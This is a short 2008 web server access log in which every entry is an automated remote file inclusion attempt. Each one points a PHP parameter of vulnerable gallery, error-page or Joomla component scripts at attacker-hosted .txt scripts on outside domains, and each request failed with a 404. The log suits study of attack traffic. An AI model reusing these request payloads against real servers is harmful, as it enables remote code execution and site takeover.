83.64.132.254 - - [22/Oct/2008:00:36:52 -0400] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://kvs.ikt-servicefag.no/backups/v8.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.76"
201.22.6.28 - - [22/Oct/2008:00:37:13 -0400] "GET /logs/access_log.Q108082900/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:37:13 -0400] "GET /errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.22.6.28 - - [22/Oct/2008:00:37:14 -0400] "GET /logs/errors.php?error=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
193.136.63.5 - - [22/Oct/2008:00:37:17 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
193.136.63.5 - - [22/Oct/2008:00:37:17 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
